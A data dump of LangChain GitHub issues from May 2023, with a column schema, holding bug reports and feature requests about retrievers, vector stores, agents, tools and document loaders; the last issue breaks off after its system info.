| column | dtype | min | max |
|---|---|---|---|
| issue_owner_repo | list | 2 | 2 |
| issue_body | string | 0 | 261k |
| issue_title | string | 1 | 925 |
| issue_comments_url | string | 56 | 81 |
| issue_comments_count | int64 | 0 | 2.5k |
| issue_created_at | string | 20 | 20 |
| issue_updated_at | string | 20 | 20 |
| issue_html_url | string | 37 | 62 |
| issue_github_id | int64 | 387k | 2.46B |
| issue_number | int64 | 1 | 127k |

(min/max are string lengths for string columns and values for int64 columns.)
[ "langchain-ai", "langchain" ]
Environment:
- DATABRICKS_RUNTIME_VERSION: 10.4
- Python 3.8.10
- LangChain 0.0.172

I was following along with the basic tutorial here: [Self-querying retriever with Chroma](https://python.langchain.com/en/latest/modules/indexes/retrievers/examples/chroma_self_query_retriever.html) and I keep getting a **TypeError: 'NoneType' object is not callable** error. Also, when I call `.get()` on the vectorstore, the embeddings field is `None`. Is this related to the error? Any idea what I'm doing wrong here? Many thanks.

![image](https://github.com/hwchase17/langchain/assets/39864161/aaa7ca89-b79e-47da-85df-4c1e498c075a)

**My full code:**

```python
from langchain.docstore.document import Document
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.vectorstores import Chroma
from langchain.llms import OpenAI
from langchain.retrievers.self_query.base import SelfQueryRetriever
from langchain.chains.query_constructor.base import AttributeInfo

docs = [
    Document(
        page_content="A bunch of scientists bring back dinosaurs and mayhem breaks loose",
        metadata={"year": 1993, "rating": 7.7, "genre": "action"},
    ),
    Document(
        page_content="Leo DiCaprio gets lost in a dream within a dream within a dream within a ...",
        metadata={"year": 2010, "director": "Christopher Nolan", "rating": 8.2},
    ),
    Document(
        page_content="A psychologist / detective gets lost in a series of dreams within dreams within dreams and Inception reused the idea",
        metadata={"year": 2006, "director": "Satoshi Kon", "rating": 8.6},
    ),
    Document(
        page_content="A bunch of normal-sized women are supremely wholesome and some men pine after them",
        metadata={"year": 2019, "director": "Greta Gerwig", "rating": 8.3},
    ),
    Document(
        page_content="Toys come alive and have a blast doing so",
        metadata={"year": 1995, "genre": "animated"},
    ),
    Document(
        page_content="Three men walk into the Zone, three men walk out of the Zone",
        metadata={"year": 1979, "rating": 9.9, "director": "Andrei Tarkovsky", "genre": "science fiction"},
    ),
]

embeddings = OpenAIEmbeddings(chunk_size=1)
vectorstore = Chroma.from_documents(docs, embeddings)

metadata_field_info = [
    AttributeInfo(name="genre", description="The genre of the movie", type="string or list[string]"),
    AttributeInfo(name="year", description="The year the movie was released", type="integer"),
    AttributeInfo(name="director", description="The name of the movie director", type="string"),
    AttributeInfo(name="rating", description="A 1-10 rating for the movie", type="float"),
]

document_content_description = "Brief summary of a movie"
llm = OpenAI(temperature=0)
retriever = SelfQueryRetriever.from_llm(
    llm, vectorstore, document_content_description, metadata_field_info, verbose=True
)
```

**Traceback:**

```
TypeError                                 Traceback (most recent call last)
<command-1036279072864042> in <module>
     27 document_content_description = "Brief summary of a movie"
     28 llm = OpenAI(temperature=0)
---> 29 retriever = SelfQueryRetriever.from_llm(llm, vectorstore, document_content_description, metadata_field_info, verbose=True)

/databricks/python/lib/python3.8/site-packages/langchain/retrievers/self_query/base.py in from_llm(cls, llm, vectorstore, document_contents, metadata_field_info, structured_query_translator, chain_kwargs, enable_limit, **kwargs)
    112             "allowed_operators"
    113         ] = structured_query_translator.allowed_operators
--> 114         llm_chain = load_query_constructor_chain(
    115             llm,
    116             document_contents,

/databricks/python/lib/python3.8/site-packages/langchain/chains/query_constructor/base.py in load_query_constructor_chain(llm, document_contents, attribute_info, examples, allowed_comparators, allowed_operators, enable_limit, **kwargs)
    123     **kwargs: Any,
    124 ) -> LLMChain:
--> 125     prompt = _get_prompt(
    126         document_contents,
    127         attribute_info,

/databricks/python/lib/python3.8/site-packages/langchain/chains/query_constructor/base.py in _get_prompt(document_contents, attribute_info, examples, allowed_comparators, allowed_operators, enable_limit)
    100         i=len(examples) + 1, content=document_contents, attributes=attribute_str
    101     )
--> 102     output_parser = StructuredQueryOutputParser.from_components(
    103         allowed_comparators=allowed_comparators, allowed_operators=allowed_operators
    104     )

/databricks/python/lib/python3.8/site-packages/langchain/chains/query_constructor/base.py in from_components(cls, allowed_comparators, allowed_operators)
     57         allowed_operators: Optional[Sequence[Operator]] = None,
     58     ) -> StructuredQueryOutputParser:
---> 59         ast_parser = get_parser(
     60             allowed_comparators=allowed_comparators, allowed_operators=allowed_operators
     61         )

/databricks/python/lib/python3.8/site-packages/langchain/chains/query_constructor/parser.py in get_parser(allowed_comparators, allowed_operators)
    127     allowed_operators: Optional[Sequence[Operator]] = None,
    128 ) -> Lark:
--> 129     transformer = QueryTransformer(
    130         allowed_comparators=allowed_comparators, allowed_operators=allowed_operators
    131     )
```
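A minimal illustration of this failure mode. The assumption here (not confirmed by the report itself) is that when the optional `lark` dependency is missing, the symbol the query-constructor parser needs ends up as `None`, and calling it produces exactly the error in the traceback:

```python
# Stand-in for the symbol hypothetically left as None when `lark` is absent.
QueryTransformer = None

try:
    QueryTransformer(allowed_comparators=None, allowed_operators=None)
except TypeError as err:
    message = str(err)

print(message)  # 'NoneType' object is not callable
```

If this hypothesis applies, `pip install lark` in the Databricks environment would be worth trying before anything else.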
TypeError when using SelfQueryRetriever
https://api.github.com/repos/langchain-ai/langchain/issues/4887/comments
8
2023-05-17T22:42:25Z
2023-09-22T16:08:59Z
https://github.com/langchain-ai/langchain/issues/4887
1,714,743,745
4,887
[ "langchain-ai", "langchain" ]
### System Info

macOS, langchain 0.0.172

### Who can help?

@vowelparrot

### Information

- [ ] The official example notebooks/scripts
- [X] My own modified scripts

### Related Components

- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

1. Used `tool = AIPluginTool.from_plugin_url("http://localhost:4242/ai-plugin.json")` with a local plugin, which nicely produced a POST API request as a tool.
2. When executing a POST, the message was:
   ```
   Thought: I need to use the MomoTodo API to create reminders for each meal tomorrow.
   Action: requests_post
   Action Input: json string {"url": "http://localhost:4242/momotodos", "data": {"title": "Reminder: Breakfast", "completed": false}}
   ```
3. The action input is parsed in
   https://github.com/hwchase17/langchain/blob/master/langchain/tools/requests/tool.py#L70
   https://github.com/hwchase17/langchain/blob/master/langchain/tools/requests/tool.py#L18
   Due to the prefix "json string", parsing fails:
   `Observation: JSONDecodeError('Expecting value: line 1 column 1 (char 0)')`

### Expected behavior

The POST request's action string should always be JSON, but we can't expect the model to always emit clean JSON. The input should be cleaned up and parsed properly.
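A sketch of the cleanup the report asks for. `parse_tool_input` is a hypothetical helper, not the library's implementation: it strips any prose prefix (such as "json string") before the first `{` and only then decodes:

```python
import json

def parse_tool_input(text: str) -> dict:
    """Tolerant parse: drop any prose prefix before the first '{' so inputs
    like 'json string {...}' still decode. Hypothetical helper for illustration."""
    start = text.find("{")
    if start == -1:
        raise ValueError(f"no JSON object found in input: {text!r}")
    return json.loads(text[start:])

raw = 'json string {"url": "http://localhost:4242/momotodos", "data": {"title": "Reminder: Breakfast", "completed": false}}'
payload = parse_tool_input(raw)
print(payload["url"])  # http://localhost:4242/momotodos
```

For inputs with trailing prose after the object, `json.JSONDecoder().raw_decode` would be the more robust choice, since it stops at the end of the first valid JSON value.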
RequestsPostTool parsing of the input text is naive and tends to fail, since the JSON sometimes has prefixes.
https://api.github.com/repos/langchain-ai/langchain/issues/4886/comments
1
2023-05-17T22:18:43Z
2023-09-10T16:16:03Z
https://github.com/langchain-ai/langchain/issues/4886
1,714,726,354
4,886
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise.

Hi there, the load_tools function implemented in https://python.langchain.com/en/latest/_modules/langchain/agents/load_tools.html won't accept custom tools. I'm trying to enrich the agent debates with tools discussed here https://python.langchain.com/en/latest/use_cases/agent_simulations/two_agent_debate_tools.html with a new prompt-based tool:

```python
@tool("optimistic_string")
def optimistic_string(input_string: str) -> str:
    """Rewrites the input string with a more optimistic tone."""
    # Add your logic to process the input_string and generate the output_string
    prompt = "Rewrite the following sentence with a more optimistic tone: {{input_string}}"
    output_string = llm.generate(prompt)  # Replace this with the actual call to the language model
    return output_string
```

But it's not possible at the moment, as load_tools raises an error for unrecognized tools. How do we add custom tools to the simulation? Can anyone provide guidance? It is paramount to be able to customize tools to take full advantage of agent-based simulation. Thanks! :)

### Suggestion:

_No response_
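A self-contained sketch of the usual workaround pattern (stand-in registry, not the real langchain code): `load_tools` only resolves names in its built-in registry, so custom tools are appended to the resulting list afterwards instead of being routed through `load_tools`:

```python
# Stand-in registry mirroring the behavior described in the issue.
BUILTIN_TOOLS = {"serpapi": "<search tool>", "llm-math": "<calculator tool>"}

def load_tools(names):
    tools = []
    for name in names:
        if name not in BUILTIN_TOOLS:
            raise ValueError(f"Got unknown tool {name}")  # the hardcoded error
        tools.append(BUILTIN_TOOLS[name])
    return tools

custom_tool = "<optimistic_string tool>"
# Workaround: build the built-in list, then append custom tools directly.
tools = load_tools(["llm-math"]) + [custom_tool]
print(tools)
```

The combined `tools` list can then be handed to the agent constructor, which accepts any tool objects regardless of whether `load_tools` knows their names.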
ValueError(f"Got unknown tool {name}") hardcoded for custom tools in load_tools.py
https://api.github.com/repos/langchain-ai/langchain/issues/4884/comments
8
2023-05-17T22:06:33Z
2023-05-20T16:32:10Z
https://github.com/langchain-ai/langchain/issues/4884
1,714,715,520
4,884
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise.

I am trying to delete a single document from the Chroma db using the following code:

```python
chroma_db = Chroma(
    persist_directory=embeddings_save_path,
    embedding_function=OpenAIEmbeddings(
        model=os.getenv("EMBEDDING_MODEL_NAME"), chunk_size=1, max_retries=5
    ),
)
chroma_db._collection.delete(ids=list_of_ids)
chroma_db.persist()
```

However, the document is not actually being deleted. After loading/re-loading the Chroma db from local storage, it still shows the document.

I have tried the following things to fix the issue:

- I have made sure that the list of ids is correct.
- I have tried deleting the document multiple times.
- I have tried restarting the Chroma db server.

None of these have worked. I am not sure why the document is not being deleted. I would appreciate any help in resolving this issue.

Thanks,
Anant Patankar

### Suggestion:

_No response_
Issue: Chromadb document deletion not working
https://api.github.com/repos/langchain-ai/langchain/issues/4880/comments
18
2023-05-17T20:16:45Z
2024-08-10T13:28:34Z
https://github.com/langchain-ai/langchain/issues/4880
1,714,599,007
4,880
[ "langchain-ai", "langchain" ]
### Feature request

It would be helpful if we could define which file types we want to load via the [Google Drive loader](https://python.langchain.com/en/latest/modules/indexes/document_loaders/examples/google_drive.html#), i.e. only docs, or sheets, or PDFs.

### Motivation

The current loader loads three file types: doc, sheet and pdf, but in my project I only want to load "application/vnd.google-apps.document".

### Your contribution

I'm happy to contribute with a PR.
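A minimal sketch of the requested behavior, with `file_types` as the hypothetical new parameter: filter the Drive file listing by MIME type before handing files to the per-type loaders. The MIME strings for docs/sheets/PDFs are the standard Google Drive ones:

```python
GOOGLE_DOC = "application/vnd.google-apps.document"
GOOGLE_SHEET = "application/vnd.google-apps.spreadsheet"
PDF = "application/pdf"

def select_files(files, file_types=(GOOGLE_DOC, GOOGLE_SHEET, PDF)):
    """Keep only files whose mimeType is in the allowed set (default: all three)."""
    return [f for f in files if f["mimeType"] in file_types]

files = [
    {"name": "notes", "mimeType": GOOGLE_DOC},
    {"name": "budget", "mimeType": GOOGLE_SHEET},
    {"name": "paper", "mimeType": PDF},
]

docs_only = select_files(files, file_types=(GOOGLE_DOC,))
print([f["name"] for f in docs_only])  # ['notes']
```

In a real PR the same filter could be pushed into the Drive API query (`mimeType='...'` in the `files.list` `q` parameter) so unwanted files are never fetched at all.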
Add the possibility to define what file types you want to load from a Google Drive
https://api.github.com/repos/langchain-ai/langchain/issues/4878/comments
1
2023-05-17T19:46:54Z
2023-09-10T16:16:08Z
https://github.com/langchain-ai/langchain/issues/4878
1,714,556,155
4,878
[ "langchain-ai", "langchain" ]
### System Info

I am trying to implement versioning of chains, with the prompt and llm config files separated from the chain.json file. When calling load_chain from langchain.chains with a chat-based LLM in the llm.json config, it yields:

```
c:\Users\KellerBrown\.virtualenvs\llm_pipeline-pYWy7I0v\lib\site-packages\langchain\llms\openai.py:169: UserWarning: You are trying to use a chat model. This way of initializing it is no longer supported. Instead, please use: `from langchain.chat_models import ChatOpenAI`
  warnings.warn(
c:\Users\KellerBrown\.virtualenvs\llm_pipeline-pYWy7I0v\lib\site-packages\langchain\llms\openai.py:696: UserWarning: You are trying to use a chat model. This way of initializing it is no longer supported. Instead, please use: `from langchain.chat_models import ChatOpenAI`
  warnings.warn(
```

I am not sure how to handle the issue, as I thought load_chain could initialize any chain from a config. Is there a different function I should use to deserialize chat-based chains?

### Who can help?

@hwchase17 @agola11

### Information

- [ ] The official example notebooks/scripts
- [ ] My own modified scripts

### Related Components

- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

**chain.json**
```json
{
    "memory": null,
    "verbose": false,
    "prompt_path": "C:/Users/KellerBrown/Projects/llm_pipeline/function_configs/document_filter/0.0/prompt.json",
    "llm_path": "C:/Users/KellerBrown/Projects/llm_pipeline/function_configs/document_filter/0.0/llm.json",
    "output_key": "text",
    "_type": "llm_chain"
}
```

**llm.json**
```json
{
    "model_name": "gpt-4",
    "temperature": 0.0,
    "max_tokens": 256,
    "top_p": 1,
    "frequency_penalty": 0,
    "presence_penalty": 0,
    "_type": "openai"
}
```

**prompt.json**
```json
{
    "input_variables": ["topic", "content"],
    "output_parser": null,
    "template": "Answer 'Yes' or 'No' only. Does the following text contain language pertaining to {topic}? {content}",
    "template_format": "f-string",
    "_type": "prompt"
}
```

**Initializing chain from chain.json with path references to llm and prompt configs**

```python
chain = load_chain('function_configs/document_filter/0.0/chain.json')
```

**Console output:** the two UserWarnings shown above.

### Expected behavior

No user warning.
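A sketch of what a chat-aware deserializer could do. This is a hypothetical helper, not langchain's API; the model-name prefix list is an assumption for illustration. The idea is that a loader could route chat-style model names to `ChatOpenAI` instead of the completion-style `OpenAI` class that triggers the warning:

```python
# Hypothetical: prefixes assumed to denote chat-completion models.
CHAT_MODEL_PREFIXES = ("gpt-4", "gpt-3.5-turbo")

def resolve_llm_class(config: dict) -> str:
    """Return the class name a loader could pick for an llm.json config."""
    model = config.get("model_name", "")
    if config.get("_type") == "openai" and model.startswith(CHAT_MODEL_PREFIXES):
        return "ChatOpenAI"
    return "OpenAI"

print(resolve_llm_class({"_type": "openai", "model_name": "gpt-4"}))  # ChatOpenAI
```

Until something like this exists in the loader, changing `"_type"` in llm.json to whatever identifier the installed version registers for `ChatOpenAI` (if any) is the avenue worth checking.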
load_chain giving UserWarning when llm.json configured for chat model
https://api.github.com/repos/langchain-ai/langchain/issues/4872/comments
1
2023-05-17T18:07:04Z
2023-09-10T16:16:13Z
https://github.com/langchain-ai/langchain/issues/4872
1,714,400,903
4,872
[ "langchain-ai", "langchain" ]
### Issue with current documentation:

One thing I constantly find myself doing is digging up the default prompts used in the various agent notebook tutorials in the docs. If each mention of an agent linked to its default prompts, I wouldn't have to dig them up, and the learning process for agents would be a lot smoother.

### Idea or request for content:

Add links to the library's default prompts to notebooks that reference agents.
DOC: Incorporate links to the underlying prompts in example docs
https://api.github.com/repos/langchain-ai/langchain/issues/4871/comments
1
2023-05-17T18:04:53Z
2023-09-10T16:16:18Z
https://github.com/langchain-ai/langchain/issues/4871
1,714,397,028
4,871
[ "langchain-ai", "langchain" ]
### System Info

Langchain 0.0.171, Python 3.9.0, Ubuntu 20.04.6 LTS

Hi @hwchase17 @agola11,

Using the dolly-v2-7b model with LangChain, I am [running into this issue](https://github.com/databrickslabs/dolly/issues/174). My question is how to chain the input properly so that the chunk from the first chain is fed into the next one, assuming that's the right way to avoid repetition of the whole generation; previously, with dolly-v2-3b, it resulted in repeating the same generation 3-4 times. I am using the following code to generate sample NDAs after feeding it a FAISS vector store whose embeddings were generated with [InstructorEmbedding](https://instructor-embedding.github.io/) (not OpenAI) using [instructor-xl](https://huggingface.co/hkunlp/instructor-xl), but I am getting this error:

`The size of tensor a (2048) must match the size of tensor b (2049) at non-singleton dimension 3`

```python
prompt_template = """Use the context below to write a detailed 5000 words NDA between the two persons:
    Context: {context}
    Topic: {topic}
    Disclosing Party: {disclosingparty}
    Receiving Party: {receivingparty}
    NDA:"""

PROMPT = PromptTemplate(
    template=prompt_template,
    input_variables=["context", "topic", "disclosingparty", "receivingparty"],
)

llm = HuggingFacePipeline.from_model_id(
    model_id="dolly-v2-7b",
    task="text-generation",
    model_kwargs={"temperature": 0, "max_length": 5000},
)

chain = LLMChain(llm=llm, prompt=PROMPT, output_key="nda_1")

prompt_template = """Using the NDA generated above within the same context as before, continue writing the nda:
    Context: {nda_1}
    NDA:"""

PROMPT = PromptTemplate(template=prompt_template, input_variables=["nda_1"])

continue_chain = LLMChain(llm=llm, prompt=PROMPT, output_key="nda_2")

overall_chain = SequentialChain(
    chains=[chain, continue_chain],
    input_variables=["context", "topic", "disclosingparty", "receivingparty"],
    output_variables=["nda_1", "nda_2"],
    verbose=True,
)

def generate_text(topic, disclosingparty, receivingparty):
    docs = db_instructEmbedd.similarity_search(topic, k=4)
    inputs = [
        {"context": doc.page_content, "topic": topic,
         "disclosingparty": disclosingparty, "receivingparty": receivingparty}
        for doc in docs
    ]
    return overall_chain.apply(inputs)

response = generate_text(
    "Based on this acquired knowledge, write a detailed NDA in 5000 words or less between these two parties on date May 15, 2023 governing rules of <country>, dont be repetitive and include all the required clauses to make it comprehensive contract",
    "Mr. X",
    "Mr. Y",
)
print(response)
```

### Who can help?

_No response_

### Information

- [ ] The official example notebooks/scripts
- [ ] My own modified scripts

### Related Components

- [X] LLMs/Chat Models
- [X] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [X] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

Running instructor-xl to generate embeddings, using SequentialChain to generate.

### Expected behavior

It should generate long-form text.
Using Dolly-v2-7b with langchain getting error: The size of tensor a (2048) must match the size of tensor b (2049) at non-singleton dimension 3
https://api.github.com/repos/langchain-ai/langchain/issues/4866/comments
1
2023-05-17T16:27:08Z
2023-09-10T16:16:23Z
https://github.com/langchain-ai/langchain/issues/4866
1,714,260,769
4,866
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise.

I am using custom tools. I used the zero-shot-react-description agent and it was not giving the final answer; it stopped after using the first tool. So I created a custom agent with custom examples in the prompt. It still behaves the same way. This is the output of the agent executor for one of the examples:

```python
statement = 'a query to get the average outcome variable score of all the CSAT responses'
agent_executor.run(statement)
```

Output:

```
> Entering new AgentExecutor chain...
Thought: I need to paraphrase the statement to add more context.
Action: StatementFormattingTool[a query to get the average outcome variable score of all the CSAT responses]
Observation: Get the average outcome variable score for all CSAT responses from the kda_distribution_log_02c581c9912a4ca1af7a67cd46324cf1_llm_test table.
```

It has to use SQLGenerationTool to get the query, but it stopped after using the first tool. This happens every time with other statements as well.

### Suggestion:

_No response_
Langchain agent is not continuing the entire flow of execution
https://api.github.com/repos/langchain-ai/langchain/issues/4865/comments
7
2023-05-17T16:12:55Z
2024-07-15T07:20:59Z
https://github.com/langchain-ai/langchain/issues/4865
1,714,241,439
4,865
[ "langchain-ai", "langchain" ]
### code

```python
tool_ = load_tools(["serpapi"], serpapi_api_key=serpapi_api_key)
agent = initialize_agent(tool_, llm, agent="zero-shot-react-description", verbose=True, return_intermediate_steps=True)
response = agent({"input": "45*456=?"})
```

### log

```
> Entering new AgentExecutor chain...
 I need to calculate this
Action: Search
Action Input: 45*456
Observation: A. A person who is in a position of trust and confidence to a vulnerable adult shall use the vulnerable adult's assets solely for the benefit of the vulnerable ...
Thought: This isn't what I'm looking for
Action: Search
Action Input: 45*456 math
Observation: The GCF of 45 and 456 is 3. Steps to find GCF. Find the prime factorization of 45 45 = 3 × 3 × 5; Find the prime factorization of 456
Thought: I can use this to calculate the answer
Action: Calculate
Action Input: 45*456/3
Observation: Calculate is not a valid tool, try another one.
.......
> Finished chain.
```

text-davinci-003 failed to adhere to the prompt "Action: the action to take, should be one of [Search]." Therefore, we need to modify the prompt based on the LLM (Language Model) that we are utilizing.

### Suggestion:

_No response_
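The failure in the log above can be phrased as a missing guard: the agent loops on an `Action` value that names a tool it was never given. A tiny sketch of such a check (hypothetical helper, not langchain's executor logic):

```python
# Tools the agent was actually given in the example above.
ALLOWED_TOOLS = {"Search"}

def check_action(action: str) -> str:
    """Return the observation the executor would feed back for an action name."""
    if action not in ALLOWED_TOOLS:
        return f"{action} is not a valid tool, try another one."
    return "ok"

print(check_action("Calculate"))  # Calculate is not a valid tool, try another one.
print(check_action("Search"))     # ok
```

Surfacing the allowed-tool list more forcefully in the prompt, as the report suggests, attacks the same problem from the model side.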
Issue: The agent with the text-davinci-003 model and serpapi tool attempted to utilize a non-existent tool
https://api.github.com/repos/langchain-ai/langchain/issues/4863/comments
3
2023-05-17T15:32:21Z
2023-05-22T07:25:47Z
https://github.com/langchain-ai/langchain/issues/4863
1,714,170,658
4,863
[ "langchain-ai", "langchain" ]
### System Info

Langchain v0.0.171, Mac OS

### Who can help?

@jeffchuber

### Information

- [ ] The official example notebooks/scripts
- [X] My own modified scripts

### Related Components

- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

If I initialise a Chroma database and then a retriever:

```python
db = Chroma.from_documents(
    texts,
    embeddings_function(),
    metadatas=[{"source": str(i)} for i in range(len(texts))],
    persist_directory=PERSIST_DIRECTORY,
)
querybase = db.as_retriever(search_type="mmr", search_kwargs={"k": 3, "lambda_mult": 1})
```

the retrieved files are identical whether I pass 0.1 or 0.9 as the lambda_mult parameter.

### Expected behavior

I expect different files. Digging into the code, I think there is a typo in langchain.vectorstores.chroma: the last line should be `lambda_mult` and not `lambda_mul`. As this is my first time, I'm not sure how to properly suggest or test :)

```python
    def max_marginal_relevance_search(
        self,
        query: str,
        k: int = 4,
        fetch_k: int = 20,
        lambda_mult: float = 0.5,
        filter: Optional[Dict[str, str]] = None,
        **kwargs: Any,
    ) -> List[Document]:
        """Return docs selected using the maximal marginal relevance.

        Maximal marginal relevance optimizes for similarity to query AND
        diversity among selected documents.

        Args:
            query: Text to look up documents similar to.
            k: Number of Documents to return. Defaults to 4.
            fetch_k: Number of Documents to fetch to pass to MMR algorithm.
            lambda_mult: Number between 0 and 1 that determines the degree
                of diversity among the results with 0 corresponding
                to maximum diversity and 1 to minimum diversity.
                Defaults to 0.5.
            filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None.

        Returns:
            List of Documents selected by maximal marginal relevance.
        """
        if self._embedding_function is None:
            raise ValueError(
                "For MMR search, you must specify an embedding function on"
                "creation."
            )

        embedding = self._embedding_function.embed_query(query)
        docs = self.max_marginal_relevance_search_by_vector(
            embedding, k, fetch_k, lambda_mul=lambda_mult, filter=filter
        )
        return docs
```
MMR Search in Chroma not working, typo suspected
https://api.github.com/repos/langchain-ai/langchain/issues/4861/comments
3
2023-05-17T14:41:48Z
2023-06-11T22:33:33Z
https://github.com/langchain-ai/langchain/issues/4861
1,714,064,997
4,861
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I am trying to create a FAISS index with xml files that I have downloaded. However, there doesn't seem to be a loader available for this. Are there any workarounds, or plans to add in a loader for xml files that can't be loaded with MWDumpLoader? ### Suggestion: Highlight a workaround for loading xml files in the documentation or add a document loader for them
Issue: Unable to load xml files
https://api.github.com/repos/langchain-ai/langchain/issues/4859/comments
4
2023-05-17T14:05:54Z
2024-01-10T13:56:44Z
https://github.com/langchain-ai/langchain/issues/4859
1,713,995,413
4,859
[ "langchain-ai", "langchain" ]
### System Info

I'm trying to load multiple doc files; it is not loading. Below is the code:

```python
txt_loader = DirectoryLoader(folder_path, glob="./*.docx", loader_cls=UnstructuredWordDocumentLoader)
txt_documents = txt_loader.load()
```

I have tried the below code too:

```python
def get_documents(folder_path):
    documents = []
    file_extensions = [ext.lower() for ext in os.listdir(folder_path)]

    if '.docx' in file_extensions or '.doc' in file_extensions:
        docx_loader = UnstructuredWordDocumentLoader(folder_path, mode="elements")
        docx_documents = docx_loader.load()
        documents += docx_documents

    return documents

folder_path = [
    'Documents\Letter of Invitation.docx',
    'Documents\Data Scientist Questionnaire.docx'
]
```

It is not working.

### Who can help?

_No response_

### Information

- [ ] The official example notebooks/scripts
- [ ] My own modified scripts

### Related Components

- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

-

### Expected behavior

Not loading multiple files (docx).
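One likely issue in the second snippet is that `os.listdir` returns file *names*, not extensions, and `UnstructuredWordDocumentLoader` is given a folder instead of a single file. A self-contained sketch of the collection step (the per-file loader call is only indicated as a comment, since it needs the `unstructured` dependency):

```python
import tempfile
from pathlib import Path

def find_word_docs(folder):
    """Collect .doc/.docx paths recursively; each path can then be passed to
    its own loader instance, e.g. UnstructuredWordDocumentLoader(path).load()."""
    return sorted(
        str(p) for p in Path(folder).rglob("*")
        if p.suffix.lower() in {".doc", ".docx"}
    )

# Demo on a throwaway directory with mixed file types.
with tempfile.TemporaryDirectory() as d:
    for name in ("Letter of Invitation.docx", "notes.txt", "CV.doc"):
        (Path(d) / name).touch()
    found = find_word_docs(d)

print([Path(p).name for p in found])  # ['CV.doc', 'Letter of Invitation.docx']
```

For the first snippet, a glob of `"**/*.docx"` rather than `"./*.docx"` is worth trying if the files sit in subfolders.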
Unable to load multiple word docx
https://api.github.com/repos/langchain-ai/langchain/issues/4856/comments
3
2023-05-17T12:57:21Z
2023-05-18T10:01:03Z
https://github.com/langchain-ai/langchain/issues/4856
1,713,851,650
4,856
[ "langchain-ai", "langchain" ]
### System Info Langchain version: master OS: Debian GNU/Linux 11 (bullseye) python: 3.11.3 ### Who can help? @hwchase17 @agola11 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [X] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction See this [notebook](https://gist.github.com/hsm207/69b3c24b231375b74e8a5ab6f57ffe58) ### Expected behavior Same behavior as when OpenAI or LlamaCPP is used
GPT4ALL segfaults when using RetrievalQA
https://api.github.com/repos/langchain-ai/langchain/issues/4855/comments
3
2023-05-17T12:36:49Z
2023-09-12T16:14:55Z
https://github.com/langchain-ai/langchain/issues/4855
1,713,813,644
4,855
[ "langchain-ai", "langchain" ]
[SUPPORTED_LOCATIONS](https://github.com/hwchase17/langchain/blob/720ac49f4237e8c177ac65a27903da6215fe91c8/langchain/tools/openapi/utils/api_models.py#L46) does not list APIPropertyLocation.HEADER as supported. However the comments under APIPropertyLocation next to [COOKIE](https://github.com/hwchase17/langchain/blame/720ac49f4237e8c177ac65a27903da6215fe91c8/langchain/tools/openapi/utils/api_models.py#L28) seems to indicate that HEADER is supported as it explicitly states that Cookie is not supported. Any clarifications on this?
Is APIPropertyLocation.HEADER supported?
https://api.github.com/repos/langchain-ai/langchain/issues/4854/comments
3
2023-05-17T12:26:39Z
2024-05-21T01:46:21Z
https://github.com/langchain-ai/langchain/issues/4854
1,713,795,337
4,854
[ "langchain-ai", "langchain" ]
### Issue with current documentation: Hi, I need to get just the query only for a natural language input query. I don't want to get the results/output of the query from the db, how do I do that? Thanks! ### Idea or request for content: _No response_
DOC: Get only the sql query not the output of the query in SQLDatabaseChain
https://api.github.com/repos/langchain-ai/langchain/issues/4853/comments
17
2023-05-17T12:26:11Z
2024-06-29T15:25:41Z
https://github.com/langchain-ai/langchain/issues/4853
1,713,794,430
4,853
[ "langchain-ai", "langchain" ]
### System Info

Version 0.0.171: `llamacpp.py` doesn't accept the parameter `n_gpu_layer`, whereas the code has it.

### Who can help?

@hw

### Information

- [X] The official example notebooks/scripts
- [ ] My own modified scripts

### Related Components

- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

Just try giving the parameter.

### Expected behavior

It should accept the parameter for GPU offloading.
llamacpp.py doesn't accept n_gpu_layer
https://api.github.com/repos/langchain-ai/langchain/issues/4852/comments
1
2023-05-17T11:51:09Z
2023-09-10T16:16:38Z
https://github.com/langchain-ai/langchain/issues/4852
1,713,731,745
4,852
[ "langchain-ai", "langchain" ]
### System Info

LangChain version: 0.0.171, Windows 10

### Who can help?
